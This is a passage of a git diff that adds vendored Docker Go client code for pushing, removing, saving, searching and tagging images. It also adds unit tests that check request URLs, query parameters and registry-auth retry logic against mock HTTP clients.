+	if err == nil || err.Error() != "Error response from daemon: Unauthorized error" {
+		t.Fatalf("expected an Unauthorized Error, got %v", err)
+	}
+}
+
+func TestImagePullWithUnauthorizedErrorAndPrivilegeFuncError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")),
+	}
+	privilegeFunc := func() (string, error) {
+		return "", fmt.Errorf("Error requesting privilege")
+	}
+	_, err := client.ImagePull(context.Background(), "myimage", types.ImagePullOptions{
+		PrivilegeFunc: privilegeFunc,
+	})
+	if err == nil || err.Error() != "Error requesting privilege" {
+		t.Fatalf("expected an error requesting privilege, got %v", err)
+	}
+}
+
+func TestImagePullWithUnauthorizedErrorAndAnotherUnauthorizedError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")),
+	}
+	privilegeFunc := func() (string, error) {
+		return "a-auth-header", nil
+	}
+	_, err := client.ImagePull(context.Background(), "myimage", types.ImagePullOptions{
+		PrivilegeFunc: privilegeFunc,
+	})
+	if err == nil || err.Error() != "Error response from daemon: Unauthorized error" {
+		t.Fatalf("expected an Unauthorized Error, got %v", err)
+	}
+}
+
+func TestImagePullWithPrivilegedFuncNoError(t *testing.T) {
+	expectedURL := "/images/create"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			auth := req.Header.Get("X-Registry-Auth")
+			if auth == "NotValid" {
+				return &http.Response{
+					StatusCode: http.StatusUnauthorized,
+					Body:       ioutil.NopCloser(bytes.NewReader([]byte("Invalid credentials"))),
+				}, nil
+			}
+			if auth != "IAmValid" {
+				return nil, fmt.Errorf("Invalid auth header : expected %s, got %s", "IAmValid", auth)
+			}
+			query := req.URL.Query()
+			fromImage := query.Get("fromImage")
+			if fromImage != "myimage" {
+				return nil, fmt.Errorf("fromimage not set in URL query properly. Expected '%s', got %s", "myimage", fromImage)
+			}
+			tag := query.Get("tag")
+			if tag != "latest" {
+				return nil, fmt.Errorf("tag not set in URL query properly. Expected '%s', got %s", "latest", tag)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte("hello world"))),
+			}, nil
+		}),
+	}
+	privilegeFunc := func() (string, error) {
+		return "IAmValid", nil
+	}
+	resp, err := client.ImagePull(context.Background(), "myimage", types.ImagePullOptions{
+		RegistryAuth:  "NotValid",
+		PrivilegeFunc: privilegeFunc,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	body, err := ioutil.ReadAll(resp)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if string(body) != "hello world" {
+		t.Fatalf("expected 'hello world', got %s", string(body))
+	}
+}
+
+func TestImagePullWithoutErrors(t *testing.T) {
+	expectedURL := "/images/create"
+	expectedOutput := "hello world"
+	pullCases := []struct {
+		all           bool
+		reference     string
+		expectedImage string
+		expectedTag   string
+	}{
+		{
+			all:           false,
+			reference:     "myimage",
+			expectedImage: "myimage",
+			expectedTag:   "latest",
+		},
+		{
+			all:           false,
+			reference:     "myimage:tag",
+			expectedImage: "myimage",
+			expectedTag:   "tag",
+		},
+		{
+			all:           true,
+			reference:     "myimage",
+			expectedImage: "myimage",
+			expectedTag:   "",
+		},
+		{
+			all:           true,
+			reference:     "myimage:anything",
+			expectedImage: "myimage",
+			expectedTag:   "",
+		},
+	}
+	for _, pullCase := range pullCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				query := req.URL.Query()
+				fromImage := query.Get("fromImage")
+				if fromImage != pullCase.expectedImage {
+					return nil, fmt.Errorf("fromimage not set in URL query properly. Expected '%s', got %s", pullCase.expectedImage, fromImage)
+				}
+				tag := query.Get("tag")
+				if tag != pullCase.expectedTag {
+					return nil, fmt.Errorf("tag not set in URL query properly. Expected '%s', got %s", pullCase.expectedTag, tag)
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader([]byte(expectedOutput))),
+				}, nil
+			}),
+		}
+		resp, err := client.ImagePull(context.Background(), pullCase.reference, types.ImagePullOptions{
+			All: pullCase.all,
+		})
+		if err != nil {
+			t.Fatal(err)
+		}
+		body, err := ioutil.ReadAll(resp)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if string(body) != expectedOutput {
+			t.Fatalf("expected '%s', got %s", expectedOutput, string(body))
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/image_push.go b/vendor/github.com/docker/docker/client/image_push.go
new file mode 100644
index 0000000000..8e73d28f56
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_push.go
@@ -0,0 +1,54 @@
+package client
+
+import (
+	"errors"
+	"io"
+	"net/http"
+	"net/url"
+
+	"golang.org/x/net/context"
+
+	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types"
+)
+
+// ImagePush requests the docker host to push an image to a remote registry.
+// It executes the privileged function if the operation is unauthorized
+// and it tries one more time.
+// It's up to the caller to handle the io.ReadCloser and close it properly.
+func (cli *Client) ImagePush(ctx context.Context, ref string, options types.ImagePushOptions) (io.ReadCloser, error) {
+	distributionRef, err := distreference.ParseNamed(ref)
+	if err != nil {
+		return nil, err
+	}
+
+	if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical {
+		return nil, errors.New("cannot push a digest reference")
+	}
+
+	var tag = ""
+	if nameTaggedRef, isNamedTagged := distributionRef.(distreference.NamedTagged); isNamedTagged {
+		tag = nameTaggedRef.Tag()
+	}
+
+	query := url.Values{}
+	query.Set("tag", tag)
+
+	resp, err := cli.tryImagePush(ctx, distributionRef.Name(), query, options.RegistryAuth)
+	if resp.statusCode == http.StatusUnauthorized && options.PrivilegeFunc != nil {
+		newAuthHeader, privilegeErr := options.PrivilegeFunc()
+		if privilegeErr != nil {
+			return nil, privilegeErr
+		}
+		resp, err = cli.tryImagePush(ctx, distributionRef.Name(), query, newAuthHeader)
+	}
+	if err != nil {
+		return nil, err
+	}
+	return resp.body, nil
+}
+
+func (cli *Client) tryImagePush(ctx context.Context, imageID string, query url.Values, registryAuth string) (serverResponse, error) {
+	headers := map[string][]string{"X-Registry-Auth": {registryAuth}}
+	return cli.post(ctx, "/images/"+imageID+"/push", query, nil, headers)
+}
diff --git a/vendor/github.com/docker/docker/client/image_push_test.go b/vendor/github.com/docker/docker/client/image_push_test.go
new file mode 100644
index 0000000000..b52da8b8dc
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_push_test.go
@@ -0,0 +1,180 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+)
+
+func TestImagePushReferenceError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			return nil, nil
+		}),
+	}
+	// An empty reference is an invalid reference
+	_, err := client.ImagePush(context.Background(), "", types.ImagePushOptions{})
+	if err == nil || err.Error() != "repository name must have at least one component" {
+		t.Fatalf("expected an error, got %v", err)
+	}
+	// An canonical reference cannot be pushed
+	_, err = client.ImagePush(context.Background(), "repo@sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff", types.ImagePushOptions{})
+	if err == nil || err.Error() != "cannot push a digest reference" {
+		t.Fatalf("expected an error, got %v", err)
+	}
+}
+
+func TestImagePushAnyError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ImagePush(context.Background(), "myimage", types.ImagePushOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestImagePushStatusUnauthorizedError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")),
+	}
+	_, err := client.ImagePush(context.Background(), "myimage", types.ImagePushOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Unauthorized error" {
+		t.Fatalf("expected an Unauthorized Error, got %v", err)
+	}
+}
+
+func TestImagePushWithUnauthorizedErrorAndPrivilegeFuncError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")),
+	}
+	privilegeFunc := func() (string, error) {
+		return "", fmt.Errorf("Error requesting privilege")
+	}
+	_, err := client.ImagePush(context.Background(), "myimage", types.ImagePushOptions{
+		PrivilegeFunc: privilegeFunc,
+	})
+	if err == nil || err.Error() != "Error requesting privilege" {
+		t.Fatalf("expected an error requesting privilege, got %v", err)
+	}
+}
+
+func TestImagePushWithUnauthorizedErrorAndAnotherUnauthorizedError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")),
+	}
+	privilegeFunc := func() (string, error) {
+		return "a-auth-header", nil
+	}
+	_, err := client.ImagePush(context.Background(), "myimage", types.ImagePushOptions{
+		PrivilegeFunc: privilegeFunc,
+	})
+	if err == nil || err.Error() != "Error response from daemon: Unauthorized error" {
+		t.Fatalf("expected an Unauthorized Error, got %v", err)
+	}
+}
+
+func TestImagePushWithPrivilegedFuncNoError(t *testing.T) {
+	expectedURL := "/images/myimage/push"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			auth := req.Header.Get("X-Registry-Auth")
+			if auth == "NotValid" {
+				return &http.Response{
+					StatusCode: http.StatusUnauthorized,
+					Body:       ioutil.NopCloser(bytes.NewReader([]byte("Invalid credentials"))),
+				}, nil
+			}
+			if auth != "IAmValid" {
+				return nil, fmt.Errorf("Invalid auth header : expected %s, got %s", "IAmValid", auth)
+			}
+			query := req.URL.Query()
+			tag := query.Get("tag")
+			if tag != "tag" {
+				return nil, fmt.Errorf("tag not set in URL query properly. Expected '%s', got %s", "tag", tag)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte("hello world"))),
+			}, nil
+		}),
+	}
+	privilegeFunc := func() (string, error) {
+		return "IAmValid", nil
+	}
+	resp, err := client.ImagePush(context.Background(), "myimage:tag", types.ImagePushOptions{
+		RegistryAuth:  "NotValid",
+		PrivilegeFunc: privilegeFunc,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	body, err := ioutil.ReadAll(resp)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if string(body) != "hello world" {
+		t.Fatalf("expected 'hello world', got %s", string(body))
+	}
+}
+
+func TestImagePushWithoutErrors(t *testing.T) {
+	expectedOutput := "hello world"
+	expectedURLFormat := "/images/%s/push"
+	pullCases := []struct {
+		reference     string
+		expectedImage string
+		expectedTag   string
+	}{
+		{
+			reference:     "myimage",
+			expectedImage: "myimage",
+			expectedTag:   "",
+		},
+		{
+			reference:     "myimage:tag",
+			expectedImage: "myimage",
+			expectedTag:   "tag",
+		},
+	}
+	for _, pullCase := range pullCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				expectedURL := fmt.Sprintf(expectedURLFormat, pullCase.expectedImage)
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				query := req.URL.Query()
+				tag := query.Get("tag")
+				if tag != pullCase.expectedTag {
+					return nil, fmt.Errorf("tag not set in URL query properly. Expected '%s', got %s", pullCase.expectedTag, tag)
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader([]byte(expectedOutput))),
+				}, nil
+			}),
+		}
+		resp, err := client.ImagePush(context.Background(), pullCase.reference, types.ImagePushOptions{})
+		if err != nil {
+			t.Fatal(err)
+		}
+		body, err := ioutil.ReadAll(resp)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if string(body) != expectedOutput {
+			t.Fatalf("expected '%s', got %s", expectedOutput, string(body))
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/image_remove.go b/vendor/github.com/docker/docker/client/image_remove.go
new file mode 100644
index 0000000000..839e5311c4
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_remove.go
@@ -0,0 +1,31 @@
+package client
+
+import (
+	"encoding/json"
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// ImageRemove removes an image from the docker host.
+func (cli *Client) ImageRemove(ctx context.Context, imageID string, options types.ImageRemoveOptions) ([]types.ImageDelete, error) {
+	query := url.Values{}
+
+	if options.Force {
+		query.Set("force", "1")
+	}
+	if !options.PruneChildren {
+		query.Set("noprune", "1")
+	}
+
+	resp, err := cli.delete(ctx, "/images/"+imageID, query, nil)
+	if err != nil {
+		return nil, err
+	}
+
+	var dels []types.ImageDelete
+	err = json.NewDecoder(resp.body).Decode(&dels)
+	ensureReaderClosed(resp)
+	return dels, err
+}
diff --git a/vendor/github.com/docker/docker/client/image_remove_test.go b/vendor/github.com/docker/docker/client/image_remove_test.go
new file mode 100644
index 0000000000..7b004f70e6
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_remove_test.go
@@ -0,0 +1,95 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestImageRemoveError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.ImageRemove(context.Background(), "image_id", types.ImageRemoveOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestImageRemove(t *testing.T) {
+	expectedURL := "/images/image_id"
+	removeCases := []struct {
+		force               bool
+		pruneChildren       bool
+		expectedQueryParams map[string]string
+	}{
+		{
+			force:         false,
+			pruneChildren: false,
+			expectedQueryParams: map[string]string{
+				"force":   "",
+				"noprune": "1",
+			},
+		}, {
+			force:         true,
+			pruneChildren: true,
+			expectedQueryParams: map[string]string{
+				"force":   "1",
+				"noprune": "",
+			},
+		},
+	}
+	for _, removeCase := range removeCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				if req.Method != "DELETE" {
+					return nil, fmt.Errorf("expected DELETE method, got %s", req.Method)
+				}
+				query := req.URL.Query()
+				for key, expected := range removeCase.expectedQueryParams {
+					actual := query.Get(key)
+					if actual != expected {
+						return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual)
+					}
+				}
+				b, err := json.Marshal([]types.ImageDelete{
+					{
+						Untagged: "image_id1",
+					},
+					{
+						Deleted: "image_id",
+					},
+				})
+				if err != nil {
+					return nil, err
+				}
+
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(b)),
+				}, nil
+			}),
+		}
+		imageDeletes, err := client.ImageRemove(context.Background(), "image_id", types.ImageRemoveOptions{
+			Force:         removeCase.force,
+			PruneChildren: removeCase.pruneChildren,
+		})
+		if err != nil {
+			t.Fatal(err)
+		}
+		if len(imageDeletes) != 2 {
+			t.Fatalf("expected 2 deleted images, got %v", imageDeletes)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/image_save.go b/vendor/github.com/docker/docker/client/image_save.go
new file mode 100644
index 0000000000..ecac880a32
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_save.go
@@ -0,0 +1,22 @@
+package client
+
+import (
+	"io"
+	"net/url"
+
+	"golang.org/x/net/context"
+)
+
+// ImageSave retrieves one or more images from the docker host as an io.ReadCloser.
+// It's up to the caller to store the images and close the stream.
+func (cli *Client) ImageSave(ctx context.Context, imageIDs []string) (io.ReadCloser, error) {
+	query := url.Values{
+		"names": imageIDs,
+	}
+
+	resp, err := cli.get(ctx, "/images/get", query, nil)
+	if err != nil {
+		return nil, err
+	}
+	return resp.body, nil
+}
diff --git a/vendor/github.com/docker/docker/client/image_save_test.go b/vendor/github.com/docker/docker/client/image_save_test.go
new file mode 100644
index 0000000000..8f0cf88640
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_save_test.go
@@ -0,0 +1,58 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"reflect"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"strings"
+)
+
+func TestImageSaveError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ImageSave(context.Background(), []string{"nothing"})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server error, got %v", err)
+	}
+}
+
+func TestImageSave(t *testing.T) {
+	expectedURL := "/images/get"
+	client := &Client{
+		client: newMockClient(func(r *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(r.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL)
+			}
+			query := r.URL.Query()
+			names := query["names"]
+			expectedNames := []string{"image_id1", "image_id2"}
+			if !reflect.DeepEqual(names, expectedNames) {
+				return nil, fmt.Errorf("names not set in URL query properly. Expected %v, got %v", names, expectedNames)
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte("response"))),
+			}, nil
+		}),
+	}
+	saveResponse, err := client.ImageSave(context.Background(), []string{"image_id1", "image_id2"})
+	if err != nil {
+		t.Fatal(err)
+	}
+	response, err := ioutil.ReadAll(saveResponse)
+	if err != nil {
+		t.Fatal(err)
+	}
+	saveResponse.Close()
+	if string(response) != "response" {
+		t.Fatalf("expected response to contain 'response', got %s", string(response))
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/image_search.go b/vendor/github.com/docker/docker/client/image_search.go
new file mode 100644
index 0000000000..b0fcd5c23d
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_search.go
@@ -0,0 +1,51 @@
+package client
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/registry"
+	"golang.org/x/net/context"
+)
+
+// ImageSearch makes the docker host to search by a term in a remote registry.
+// The list of results is not sorted in any fashion.
+func (cli *Client) ImageSearch(ctx context.Context, term string, options types.ImageSearchOptions) ([]registry.SearchResult, error) {
+	var results []registry.SearchResult
+	query := url.Values{}
+	query.Set("term", term)
+	query.Set("limit", fmt.Sprintf("%d", options.Limit))
+
+	if options.Filters.Len() > 0 {
+		filterJSON, err := filters.ToParam(options.Filters)
+		if err != nil {
+			return results, err
+		}
+		query.Set("filters", filterJSON)
+	}
+
+	resp, err := cli.tryImageSearch(ctx, query, options.RegistryAuth)
+	if resp.statusCode == http.StatusUnauthorized && options.PrivilegeFunc != nil {
+		newAuthHeader, privilegeErr := options.PrivilegeFunc()
+		if privilegeErr != nil {
+			return results, privilegeErr
+		}
+		resp, err = cli.tryImageSearch(ctx, query, newAuthHeader)
+	}
+	if err != nil {
+		return results, err
+	}
+
+	err = json.NewDecoder(resp.body).Decode(&results)
+	ensureReaderClosed(resp)
+	return results, err
+}
+
+func (cli *Client) tryImageSearch(ctx context.Context, query url.Values, registryAuth string) (serverResponse, error) {
+	headers := map[string][]string{"X-Registry-Auth": {registryAuth}}
+	return cli.get(ctx, "/images/search", query, headers)
+}
diff --git a/vendor/github.com/docker/docker/client/image_search_test.go b/vendor/github.com/docker/docker/client/image_search_test.go
new file mode 100644
index 0000000000..b17bbd8343
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_search_test.go
@@ -0,0 +1,165 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"encoding/json"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/registry"
+)
+
+func TestImageSearchAnyError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestImageSearchStatusUnauthorizedError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")),
+	}
+	_, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Unauthorized error" {
+		t.Fatalf("expected an Unauthorized Error, got %v", err)
+	}
+}
+
+func TestImageSearchWithUnauthorizedErrorAndPrivilegeFuncError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")),
+	}
+	privilegeFunc := func() (string, error) {
+		return "", fmt.Errorf("Error requesting privilege")
+	}
+	_, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{
+		PrivilegeFunc: privilegeFunc,
+	})
+	if err == nil || err.Error() != "Error requesting privilege" {
+		t.Fatalf("expected an error requesting privilege, got %v", err)
+	}
+}
+
+func TestImageSearchWithUnauthorizedErrorAndAnotherUnauthorizedError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")),
+	}
+	privilegeFunc := func() (string, error) {
+		return "a-auth-header", nil
+	}
+	_, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{
+		PrivilegeFunc: privilegeFunc,
+	})
+	if err == nil || err.Error() != "Error response from daemon: Unauthorized error" {
+		t.Fatalf("expected an Unauthorized Error, got %v", err)
+	}
+}
+
+func TestImageSearchWithPrivilegedFuncNoError(t *testing.T) {
+	expectedURL := "/images/search"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			auth := req.Header.Get("X-Registry-Auth")
+			if auth == "NotValid" {
+				return &http.Response{
+					StatusCode: http.StatusUnauthorized,
+					Body:       ioutil.NopCloser(bytes.NewReader([]byte("Invalid credentials"))),
+				}, nil
+			}
+			if auth != "IAmValid" {
+				return nil, fmt.Errorf("Invalid auth header : expected 'IAmValid', got %s", auth)
+			}
+			query := req.URL.Query()
+			term := query.Get("term")
+			if term != "some-image" {
+				return nil, fmt.Errorf("term not set in URL query properly. Expected 'some-image', got %s", term)
+			}
+			content, err := json.Marshal([]registry.SearchResult{
+				{
+					Name: "anything",
+				},
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+	privilegeFunc := func() (string, error) {
+		return "IAmValid", nil
+	}
+	results, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{
+		RegistryAuth:  "NotValid",
+		PrivilegeFunc: privilegeFunc,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(results) != 1 {
+		t.Fatalf("expected 1 result, got %v", results)
+	}
+}
+
+func TestImageSearchWithoutErrors(t *testing.T) {
+	expectedURL := "/images/search"
+	filterArgs := filters.NewArgs()
+	filterArgs.Add("is-automated", "true")
+	filterArgs.Add("stars", "3")
+
+	expectedFilters := `{"is-automated":{"true":true},"stars":{"3":true}}`
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			query := req.URL.Query()
+			term := query.Get("term")
+			if term != "some-image" {
+				return nil, fmt.Errorf("term not set in URL query properly. Expected 'some-image', got %s", term)
+			}
+			filters := query.Get("filters")
+			if filters != expectedFilters {
+				return nil, fmt.Errorf("filters not set in URL query properly. Expected '%s', got %s", expectedFilters, filters)
+			}
+			content, err := json.Marshal([]registry.SearchResult{
+				{
+					Name: "anything",
+				},
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+	results, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{
+		Filters: filterArgs,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(results) != 1 {
+		t.Fatalf("expected a result, got %v", results)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/image_tag.go b/vendor/github.com/docker/docker/client/image_tag.go
new file mode 100644
index 0000000000..bdbf94add2
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_tag.go
@@ -0,0 +1,34 @@
+package client
+
+import (
+	"errors"
+	"fmt"
+	"net/url"
+
+	"golang.org/x/net/context"
+
+	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types/reference"
+)
+
+// ImageTag tags an image in the docker host
+func (cli *Client) ImageTag(ctx context.Context, imageID, ref string) error {
+	distributionRef, err := distreference.ParseNamed(ref)
+	if err != nil {
+		return fmt.Errorf("Error parsing reference: %q is not a valid repository/tag", ref)
+	}
+
+	if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical {
+		return errors.New("refusing to create a tag with a digest reference")
+	}
+
+	tag := reference.GetTagFromNamedRef(distributionRef)
+
+	query := url.Values{}
+	query.Set("repo", distributionRef.Name())
+	query.Set("tag", tag)
+
+	resp, err := cli.post(ctx, "/images/"+imageID+"/tag", query, nil, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/image_tag_test.go b/vendor/github.com/docker/docker/client/image_tag_test.go
new file mode 100644
index 0000000000..7925db9f1b
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_tag_test.go
@@ -0,0 +1,121 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+)
+
+func TestImageTagError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.ImageTag(context.Background(), "image_id", "repo:tag")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+// Note: this is not testing all the InvalidReference as it's the reponsability
+// of distribution/reference package.
+func TestImageTagInvalidReference(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.ImageTag(context.Background(), "image_id", "aa/asdf$$^/aa")
+	if err == nil || err.Error() != `Error parsing reference: "aa/asdf$$^/aa" is not a valid repository/tag` {
+		t.Fatalf("expected ErrReferenceInvalidFormat, got %v", err)
+	}
+}
+
+func TestImageTag(t *testing.T) {
+	expectedURL := "/images/image_id/tag"
+	tagCases := []struct {
+		reference           string
+		expectedQueryParams map[string]string
+	}{
+		{
+			reference: "repository:tag1",
+			expectedQueryParams: map[string]string{
+				"repo": "repository",
+				"tag":  "tag1",
+			},
+		}, {
+			reference: "another_repository:latest",
+			expectedQueryParams: map[string]string{
+				"repo": "another_repository",
+				"tag":  "latest",
+			},
+		}, {
+			reference: "another_repository",
+			expectedQueryParams: map[string]string{
+				"repo": "another_repository",
+				"tag":  "latest",
+			},
+		}, {
+			reference: "test/another_repository",
+			expectedQueryParams: map[string]string{
+				"repo": "test/another_repository",
+				"tag":  "latest",
+			},
+		}, {
+			reference: "test/another_repository:tag1",
+			expectedQueryParams: map[string]string{
+				"repo": "test/another_repository",
+				"tag":  "tag1",
+			},
+		}, {
+			reference: "test/test/another_repository:tag1",
+			expectedQueryParams: map[string]string{
+				"repo": "test/test/another_repository",
+				"tag":  "tag1",
+			},
+		}, {
+			reference: "test:5000/test/another_repository:tag1",
+			expectedQueryParams: map[string]string{
+				"repo": "test:5000/test/another_repository",
+				"tag":  "tag1",
+			},
+		}, {
+			reference: "test:5000/test/another_repository",
+			expectedQueryParams: map[string]string{
+				"repo": "test:5000/test/another_repository",
+				"tag":  "latest",
+			},
+		},
+	}
+	for _, tagCase := range tagCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				if req.Method != "POST" {
+					return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+				}
+				query := req.URL.Query()
+				for key, expected := range tagCase.expectedQueryParams {
+					actual := query.Get(key)
+					if actual != expected {
+						return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual)
+					}
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+				}, nil
+			}),
+		}
